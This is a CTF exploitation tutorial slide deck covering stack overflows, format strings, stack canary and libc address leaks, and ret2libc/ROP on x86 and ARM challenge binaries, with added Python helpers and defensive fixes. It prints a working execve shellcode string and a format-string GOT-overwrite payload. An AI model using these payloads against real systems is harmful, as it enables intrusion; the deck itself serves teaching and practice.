Exploitation in CTFs kelwin <[email protected]> blue-lotus




Page 1:

Exploitation in CTFs

kelwin <[email protected]>

blue-lotus

Page 2:

What is Capture The Flag?

• Hacking Game - For fun and get to know friends

• Free Training Course - To learn from best hackers in the world

• Techniques Playground - For practice

Page 3:

What is Exploitation?

• Broad Definition
  – Launch arbitrary attacks against vulnerabilities.

• Narrow Definition
  – Launch control-hijacking attacks against vulnerable binaries to get a privileged shell.

Page 4:

What kinds of vulnerabilities may lead to control-hijacking attacks?

• Memory bugs
  – Buffer overflow
    • Stack overflow
    • Heap overflow
  – Integer overflow
    • Number overflow
    • Array index overflow
  – Format string
  – Use after free

• Command injection

• Object serialization in scripting languages

Page 5:

Exploitation in CTFs vs Real World

• CTFs
  – Much smaller services
  – Designed with some exploit tricks

• Real World
  – Large software
  – Exploit difficulty varies from trivial to very hard

• Similarity
  – Vulnerability types
  – Basic exploit idea

Page 6:

Outline

• Introduction to basic stack overflow
• Detailed guide to solving a CTF exploit challenge
• Overview of challenges in the world’s top CTFs

Page 7:

IO SmashTheStack Level05.c

Page 8:

ELF Format

• Executable and Linkable Format
• 3 main types of object files
  – relocatable file: gcc -c test.c => test.o (test.a)
  – executable file: gcc -o test test.c => test
  – shared object file: test.so
• Parallel views
  – Linking View
  – Execution View

Page 9:

ELF Header

Page 10:

Section Header Table

Page 11:

Program Header Table

gcc: -z execstack

Page 12:

About Stack

• Region of memory managed with stack discipline
• Grows toward lower addresses
• Register %esp indicates the lowest stack address
  – address of the top element
• Stack Operations
  – pushl -> %esp+4
  – popl -> %esp-4

[Figure: the stack drawn as a column of bytes, %esp pointing at the stack top, the stack bottom at the higher address]

Page 13:

Calling Convention (cdecl)

[Figure: the stack at a call, from high to low address: %ebp in caller’s caller, arguments 3, 2, 1, return address, %ebp in caller]

Page 14:

Memory Layout (Linux x86)

• Stack
• Shared Libraries
• Heap
• Data (Global/Static)
• Text

[Figure: the address space from 0xFFFFFFFF down to 0x00000000: 0xFFFFFFFF to 0xC0000000 reserved for the kernel; the stack (%esp) growing down from 0xC0000000; shared libraries at 0x40000000; heap; data; text starting at 0x08048000; unused below]

Page 15:

Stack Frame

[Figure: one stack frame, from high to low address: arguments, return address, stack frame pointer (%ebp points here, at the saved previous stack frame pointer), [exception handlers], local variables, callee saved registers, %esp at the bottom; drawn inside the Linux x86 layout of the previous slide (kernel above 0xC0000000, stack, shared libraries at 0x40000000, heap, data, text at 0x08048000, unused, down to 0x00000000)]

Page 16:

objdump -d level05

Page 17:

objdump -d level05

char * strcpy ( char * destination, const char * source );

Page 18:

objdump -d -j <section name>

Page 19:

Buffer Overflow

[Figure: the frame of the vulnerable function, from high to low address: char **argv, int argc, return address, previous %ebp, char buf[128]]

Page 20:

Buffer Overflow

[Figure: the same frame after an overlong copy: char **argv and int argc are untouched; buf[132~135] now occupies the return address slot, buf[128~131] the previous %ebp slot, and buf[0~127] the buffer itself]

Page 21:

GDB

• Starting GDB
  – gdb program + run [arglist]
  – gdb --args program [arglist] + run
  – attach pid
• Stopping GDB
  – quit
  – Ctrl-d

Page 22:

GDB

• Breakpoints and Watchpoints
  – break function
  – break *addr
  – info break
  – clear function
  – delete/enable/disable [n]
  – watch expr
  – info watch

Page 23:

GDB

• Execution Control
  – continue (c)
  – step (s)
  – stepi (si)
  – next (n)
  – nexti (ni)

Page 24:

GDB

• Display
  – print [/f] expr
    • x hex
    • d signed decimal
    • u unsigned decimal
    • o octal
    • t binary
    • a address
    • c character
    • f floating point
  – info reg [rn]

Page 25:

GDB

• Display
  – x [/Nuf] expr
    • N count of units to display
    • u unit size
      – b bytes
      – h halfwords (two bytes)
      – w words (four bytes)
      – g giant words (eight bytes)
    • f printing format
      – s null-terminated string
      – i machine instructions
  – disassem [addr]

Page 26:

Buffer Overflow Exploit

[Figure: the frame filled by the attack buffer: char **argv and int argc above, the return address slot holding the evil code address, and the evil code occupying the buffer below it]

Construct evil buffer: buf = evil_code + evil_code_address

Page 27:

Buffer Overflow Exploit

[Figure: alternative layout: the evil code sits above the return address slot (at higher addresses), the return address slot holds the evil code address pointing up to it, and the buffer below is useless filler]

Construct evil buffer: buf = evil_code + evil_code_address

Page 28:

Shellcode

• What is shellcode
  – A small piece of code used as the payload in the exploitation of a software vulnerability
  – Typically it starts a command shell from which the attacker can control the compromised machine
• What we use here
  – We use the execve system call to obtain a high-permission-level shell

Page 29:

Shellcode

[Figure: the string "/bin//sh" and its terminating 0 laid out on the stack word by word ("//sh" and "/bin" pushed after a 0), next to the register table at the system call]

syscall calling convention: %eax=0xb, %ebx=filename, %ecx=argv, %edx=envp (the table also lists %esi, %edi, %ebp, %esp, which carry no execve argument)

"/bin//sh"

CLTD converts signed long word EAX to double word EDX:EAX

int execve(const char *filename, char *const argv[], char *const envp[]);

Page 30:

Shellcode

Page 31:

Shellcode

SHELLCODE = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"

Page 32:

Exploit

• Construct Attacking Buffer
  – buf = NOP + SHELLCODE + RET_ADDRESS
• How to find the return address
  – debugging
  – pattern_tool.py from metasploit
    • “Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2A”
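The pattern idea the slide refers to, as an added Python example (not the slides' code, and not the metasploit tool itself): it regenerates the Aa0Aa1… pattern and maps a 32-bit register value captured in gdb after the crash back to the offset of the input bytes that landed there. The function names are my own.

```python
import string
import struct


def pattern_create(length: int) -> str:
    """Metasploit-style cyclic pattern: Upper+lower+digit triplets in order
    (Aa0Aa1...Aa9Ab0...), so every 4-byte window is unique within the first
    26*26*10*3 = 20280 characters."""
    groups = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                groups.append(upper + lower + digit)
                if 3 * len(groups) >= length:
                    return "".join(groups)[:length]
    return "".join(groups)[:length]


def pattern_offset(value, length: int = 20280):
    """Offset inside the pattern of the 4 bytes that ended up in a register when
    the crash was reproduced, or None if they did not come from the pattern.

    value is either the 4-char text as the debugger shows it, or the register
    value as an integer (little-endian, as on x86: 0x41306241 is 'Ab0A')."""
    if isinstance(value, int):
        value = struct.pack("<I", value).decode("latin-1")
    idx = pattern_create(length).find(value)
    return idx if idx >= 0 else None
```

For the level05 frame on slide 20 (128-byte buffer, then the saved %ebp), the return address slot begins at offset 132, which is where "Ae4A" sits in the pattern.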

Page 33:

29c3 exp300

$ file update_server
update_server: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=0x2b6f57ce78b35f20551c1a807c1ed892851e1ed3, stripped

$ checksec.sh --file update_server
RELRO           STACK CANARY      NX            PIE
Partial RELRO   Canary found      NX disabled   No PIE

x86 Linux ELF; stack is executable; stack has canaries

Page 34:

Protections

• RELRO
  – Relocation Read Only
• Stack Canary
  – Put a random value on the stack and verify it when the function returns
• NX
  – Stack/Heap/Static Area are not executable
• PIE
  – Base address of TEXT is random
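An added Python example (not from the slides) that reads only the ELF header and program header table from slides 8 to 11 and reports the NX, PIE and RELRO columns that checksec.sh prints: PT_GNU_STACK without the X flag means NX, e_type ET_DYN on a main program means PIE, a PT_GNU_RELRO segment means RELRO. build_elf32 constructs synthetic test images; the "relro" flag only says a RELRO segment exists, it does not distinguish partial from full.

```python
import struct

# ELF constants (from the ELF spec and the GNU ABI extensions)
ET_EXEC = 2                # executable with a fixed load address (checksec: "No PIE")
ET_DYN = 3                 # shared object; a main program of this type is PIE
PT_GNU_STACK = 0x6474E551  # stack permissions; "gcc -z execstack" sets its X flag
PT_GNU_RELRO = 0x6474E552  # region made read-only after relocation
PF_X = 0x1                 # segment flag: executable


def elf_protections(data: bytes) -> dict:
    """Report NX / PIE / RELRO for an ELF32 or ELF64 image, the way checksec does.

    Full RELRO would additionally need BIND_NOW in the dynamic section, which is
    not parsed here, so 'relro' means "a GNU_RELRO segment is present".
    """
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    is64 = data[4] == 2                 # EI_CLASS: 1 = ELF32, 2 = ELF64
    end = "<" if data[5] == 1 else ">"  # EI_DATA: 1 = little-endian
    # e_type, e_machine, e_version, e_entry, e_phoff, e_shoff, e_flags,
    # e_ehsize, e_phentsize, e_phnum (e_entry/e_phoff/e_shoff widen on ELF64)
    fmt = end + ("HHIQQQIHHH" if is64 else "HHIIIIIHHH")
    fields = struct.unpack_from(fmt, data, 16)
    e_type, e_phoff, e_phentsize, e_phnum = fields[0], fields[4], fields[8], fields[9]

    stack_exec = True  # without PT_GNU_STACK the kernel has traditionally kept the stack executable
    has_relro = False
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        if is64:  # ELF64: p_type, p_flags come first
            p_type, p_flags = struct.unpack_from(end + "II", data, off)
        else:     # ELF32: p_flags follows p_memsz, at byte 24 of the entry
            p_type = struct.unpack_from(end + "I", data, off)[0]
            p_flags = struct.unpack_from(end + "I", data, off + 24)[0]
        if p_type == PT_GNU_STACK:
            stack_exec = bool(p_flags & PF_X)
        elif p_type == PT_GNU_RELRO:
            has_relro = True
    return {"nx": not stack_exec, "pie": e_type == ET_DYN, "relro": has_relro}


def build_elf32(e_type: int, segments) -> bytes:
    """Construct a minimal little-endian ELF32 image for testing (not a real binary).

    segments is a list of (p_type, p_flags); the image is the 52-byte header
    followed by 32-byte program headers with zeroed offsets and sizes.
    """
    e_ident = b"\x7fELF" + bytes([1, 1, 1]) + bytes(9)  # ELFCLASS32, LSB, EV_CURRENT
    phoff, phentsize = 52, 32
    header = e_ident + struct.pack("<HHIIIIIHHHHHH", e_type, 40, 1, 0, phoff, 0, 0,
                                   52, phentsize, len(segments), 40, 0, 0)  # 40 = EM_ARM
    phdrs = b"".join(struct.pack("<IIIIIIII", p_type, 0, 0, 0, 0, 0, p_flags, 4)
                     for p_type, p_flags in segments)
    return header + phdrs
```

Run elf_protections(open(path, "rb").read()) on a real binary to reproduce the checksec rows on slides 33 and 41.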

Page 35:

Reverse Engineering

[Flowchart of update_server; node labels: Input a version string; Output versions and input link; Input password; Print input version; Input < version; Input > version; Input == version; Copy input to version, Input Link; Password correct]

version Format: len str0(version) \x00 str1 \x00 str2 \x00

Page 36:

Password Leak

[Figure: buf[128] adjacent to password on the stack, with high and low address marked]

If Input == version:

Page 37:

Canary & Addr Leak

If Input > version:

len str0 \x00 str1 \x00

gdb debugging command: x/ns

Page 38:

Canary & Addr Leak

len str0 \x00 str1 \x00

[Figure: stack layout: buf[128], password[128], stack canary, return address]

When building the stack guard, it has been traditionally important to have the value start (in memory) with a zero byte to protect the guard value (and the rest of the stack past it) from being read via strcpy, etc.

This patch reduces the number of random bytes by one, leaving the leading zero byte.

Page 39:

fork() service Debugging

• attach
  – pause the client side to have time to attach
• set follow-fork-mode child
  – prepare everything in the gdb script

Page 40:

Exploit

[Figure: stack from low to high address: buf, ……, stack canary, ……, return address]

Page 41:

Secuinside 2013 final: lockd

$ file lockd
lockd: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=0xa1634b7876fee62858e02a5167e70be37a8e0c45, stripped

$ checksec.sh --file lockd
RELRO           STACK CANARY      NX            PIE
Partial RELRO   Canary found      NX enabled    No PIE

Page 42:

Reverse Engineering

[Flowchart of lockd; node labels: Input Master Key; lock; unlock; Input floor and room number; exit]

Page 43:

Crack Master Key

[Figure: stack from low to high address: buf[20], pwd[20], stack canary, ebp, return address]

Page 44:

Crack Master Key

Page 45:

Format String Vulnerability

Page 46:

syslog

Page 47:

Common format string attacks

• \xd4\x94\x04\x08\xd6\x94\x04\x08%54548x%4$hn%59639x%5$hn

[Figure: the stack from low to high address: the format string PTR, three unknown 4-byte words, then the buffer itself: 0x80494d4, 0x80494d6, %54548x%4$hn%59639x%5$hn; the two addresses therefore sit at printf argument positions 4 and 5]

Page 48:

How about static format string?

Page 49:

GOT Rewritten

• Redirect the dynamic call
  – memcmp(&dw1, unlock_input_key, 16u)
  – memcmp => system
  – dw1 => “bin/sh”

Page 50:

$ file lonetuna
lonetuna: ELF 32-bit LSB shared object, ARM, EABI5 version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.31, BuildID[sha1]=40da44f919a5bb95cbf91a44cd979dfd3fba7e43, stripped

$ readelf -l lonetuna

Program Headers:
  Type           Offset   VirtAddr   PhysAddr   FileSiz MemSiz  Flg Align
  EXIDX          0x002e40 0x00002e40 0x00002e40 0x00008 0x00008 R   0x4
  PHDR           0x000034 0x00000034 0x00000034 0x00120 0x00120 R E 0x4
  INTERP         0x000154 0x00000154 0x00000154 0x00019 0x00019 R   0x1
      [Requesting program interpreter: /lib/ld-linux-armhf.so.3]
  LOAD           0x000000 0x00000000 0x00000000 0x02e4c 0x02e4c R E 0x8000
  LOAD           0x002f04 0x0000af04 0x0000af04 0x007a8 0x00bac RW  0x8000
  DYNAMIC        0x002f10 0x0000af10 0x0000af10 0x000f0 0x000f0 RW  0x4
  NOTE           0x000170 0x00000170 0x00000170 0x00044 0x00044 R   0x4
  GNU_STACK      0x000000 0x00000000 0x00000000 0x00000 0x00000 RW  0x4
  GNU_RELRO      0x002f04 0x0000af04 0x0000af04 0x000fc 0x000fc R   0x1

Initial information: ARM Linux ELF file, PIE enabled

The stack is not executable, so consider ret2libc/ROP

Page 51:

Reverse Engineering

Menu: 1 ) Change display text. 2 ) Upload a new font. 3 ) Exit.

[Flowchart; node labels:]
Creates a new thread that listens on a random port and keeps writing the display characters, in the current font, to whoever connects to that port
1) Input the 5 characters to display
2) Upload a font
   Input the font buffer length
   Input the font buffer
   Modify the display buffer according to the new font
3) Program exits

Page 52:

Running example

Page 53:

Denial of service attack

# nc 127.0.0.1 4321
[ERROR] ipv4 bind() failed 62
# nc 127.0.0.1 4321
[ERROR] ipv4 bind() failed 62
# nc 127.0.0.1 4321
[ERROR] ipv4 bind() failed 62

• After PPP took first blood on lonetuna, the Russian team MSLC started launching DoS attacks. The organizers did not allow DoS attacks that consume bandwidth or CPU, but did allow low-rate attacks that exploit problems in the service itself.

• For every connection it accepts, the lonetuna service listens on a port within a certain (small) range. If the listen fails there is no error handling and the program exits, so an attacker can occupy a large number of the listening ports and make every new connection's listen fail.

• Patch method: add error handling; when listening fails, increment the port number by 1 and listen again.
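The patch strategy in the last bullet, written out as an added Python example (not the service's own code, which is an ARM binary): a bind() that fails with EADDRINUSE moves on to the next port instead of exiting, and only an exhausted range is an error. SquattedPorts is a constructed stand-in for a socket so the retry logic runs offline; a real socket.socket() behaves the same way.

```python
import errno


class NoFreePortError(OSError):
    """Raised only after every port in the range has been tried."""


def bind_in_range(sock, host: str, first_port: int, port_count: int) -> int:
    """Bind sock to the first free port in [first_port, first_port + port_count).

    A bind() that fails because the port is already in use is not fatal: the
    port number is incremented and the bind is retried, so squatting on one
    port no longer kills the service.  Any other failure (bad address, missing
    permission) is a real bug and is re-raised unchanged.  Returns the port.
    """
    last_error = None
    for port in range(first_port, first_port + port_count):
        try:
            sock.bind((host, port))
            return port
        except OSError as exc:
            if exc.errno != errno.EADDRINUSE:
                raise
            last_error = exc
    raise NoFreePortError(errno.EADDRINUSE, "no free port in %d-%d"
                          % (first_port, first_port + port_count - 1)) from last_error


class SquattedPorts:
    """Constructed socket stand-in whose bind() fails on a set of squatted ports."""

    def __init__(self, taken):
        self.taken = set(taken)
        self.bound = None

    def bind(self, addr):
        host, port = addr
        if port in self.taken:
            raise OSError(errno.EADDRINUSE, "Address already in use")
        self.bound = addr
```

Capping the range (port_count) matters too: an attacker who can take every port still only gets a clean error rather than a crash.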

Page 54:

Font format analysis

• The bitmap font is 14 x 12 (length x width), 14 x 12 = 8 x 21 dots in all; 0/1 marks whether a dot is set, so 21 bytes are needed per glyph
• Visible characters have ASCII codes 0x20~0x7e; a character that uses font i has index value i. The format is as follows:

[Figure: total font count n | check marker | font 0 | font 1 | … | font n-1 | check marker | index for char 0x20 | index for char 0x21 | … | index for char 0x7e]

Page 55:

libc address leak

• ASLR is on, so addresses must be known before going any further with ROP
• The font buffer ends up on the stack; if a character index is out of range, the extra data on the stack is treated as a font and displayed, so the stack contents can be recovered from the malformed glyphs that get shown
• The stack necessarily holds main()'s return address, the address of an instruction inside __libc_start_main in libc; leaking it is enough to compute the libc base address

Page 56:

libc address leak

• Example:

Page 57:

Stack overflow

0x820 bytes are reserved on the stack for font_buf, but the received font_buf length is checked against 0x1550 bytes, which produces an overflow

Page 58:

Exploitation

• objdump + grep to search libc for gadgets
• ret2libc/ROP
  – Compute the addresses of system() and the gadget, then call system("/bin/sh") through the overflow; note that the pop r0, r4, pc gadget above is used to pass the argument (r0 is the first argument)
  – libc already contains the "/bin/sh" string

Page 59:

DEMO

• http://ascii.io/a/4972
• Exploit code: http://pastebin.com/2c6bU7bX

Page 60:

Defense

The method we used: tighten the buffer length check so that the buffer just cannot overflow (this does not prevent the address leak)
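An added Python example (not the service's code) of both checks the lonetuna font upload needed: the length check from this slide and slide 57 (the upload must fit the 0x820-byte font_buf), and the index bounds check slide 55 shows is missing (an index past the last glyph must not be resolved against stack memory). The layout follows slide 54; the 1-byte width of the count, the marker and each index, and the marker value 0xA5, are assumptions.

```python
GLYPH_BYTES = 21           # 14 x 12 dots = 168 bits = 21 bytes, as on slide 54
FIRST_CHAR, LAST_CHAR = 0x20, 0x7E
CHAR_COUNT = LAST_CHAR - FIRST_CHAR + 1   # 95 visible characters, one index each
FONT_BUF_SIZE = 0x820      # bytes reserved for font_buf on the stack (slide 57)
MARKER = 0xA5              # assumed value of the check marker; the slides do not give it


class FontError(ValueError):
    pass


def parse_font(data: bytes) -> dict:
    """Parse a font upload, enforcing the two checks the service lacked.

    Assumed widths: count n, marker and each index are one byte.
    Returns {char: 21-byte glyph}.
    """
    # Slide 60's fix: the upload must fit the stack buffer (the service accepted 0x1550).
    if len(data) > FONT_BUF_SIZE:
        raise FontError("upload of %d bytes exceeds the %d-byte font buffer" % (len(data), FONT_BUF_SIZE))
    if len(data) < 2 or data[1] != MARKER:
        raise FontError("bad header or check marker after the glyph count")
    n = data[0]
    glyphs_end = 2 + n * GLYPH_BYTES
    if len(data) != glyphs_end + 1 + CHAR_COUNT:
        raise FontError("length does not match %d glyphs plus %d indexes" % (n, CHAR_COUNT))
    if data[glyphs_end] != MARKER:
        raise FontError("bad check marker after the glyph table")
    glyphs = [data[2 + i * GLYPH_BYTES:2 + (i + 1) * GLYPH_BYTES] for i in range(n)]
    table = {}
    for k in range(CHAR_COUNT):
        idx = data[glyphs_end + 1 + k]
        # Slide 55's leak: an index >= n made the renderer read 21 bytes beyond the
        # glyph table, i.e. whatever else was on the stack.  Reject it instead.
        if idx >= n:
            raise FontError("char 0x%02x uses glyph %d but only %d glyphs were uploaded"
                            % (FIRST_CHAR + k, idx, n))
        table[chr(FIRST_CHAR + k)] = glyphs[idx]
    return table


def render(glyph: bytes) -> list:
    """Expand a glyph into 14 rows of 12 cells, '#' for a set dot (bit order assumed MSB-first, row-major)."""
    bits = "".join(format(b, "08b") for b in glyph)
    return [bits[r * 12:(r + 1) * 12].replace("1", "#").replace("0", ".") for r in range(14)]


def build_font(glyphs, indexes) -> bytes:
    """Serialize glyphs and the 95 per-character indexes in the slide's layout (constructs test uploads)."""
    return bytes([len(glyphs), MARKER]) + b"".join(glyphs) + bytes([MARKER]) + bytes(indexes)
```

With the size check in place at most 94 glyphs fit, so a 1-byte count can never point the index table past the buffer either.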

Page 61:

dc21 trouver

Page 62:

$ file trouver-lbs-patched
trouver-lbs-patched: ELF 32-bit LSB shared object, ARM, EABI5 version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.31, BuildID[sha1]=f25403d073588063d38ad70ec88be412684b3b1f, stripped

$ readelf -l trouver-lbs-patched | grep STACK
  GNU_STACK      0x000000 0x00000000 0x00000000 0x00000 0x00000 RW  0x4

Initial information: ARM Linux ELF file, PIE enabled

The stack is not executable, so consider ret2libc/ROP

Page 63:

Reverse engineering & vulnerability hunting

[Flowchart of trouver; node labels: Login; Initialize directory under tmp; Create file; Rename file; List files]

The buffer length limit on the file-listing result produces a 1-byte overflow (0x200 becomes 0x20a)

Page 64:

Exploitation

• Use the overflow in file listing to print stack data (libc address leak)
• Exploit the overflow again
• ROP note: the getdents system call (number 141) returns file names in lexicographic order

Page 65:

Skill List

• Reverse Engineering/Assembly
• Understand Architecture with OS
• Linux Command
• Scripting
  – python
• Debugging Tools
  – gdb
• Vulnerabilities
• Exploit Techniques
  – Ret2Libc
  – ROP

Page 66:

Learn by Practice

• Participating in CTFs
• Wargames
  – exploit-exercises.com
  – io smash the stack
• Open Courses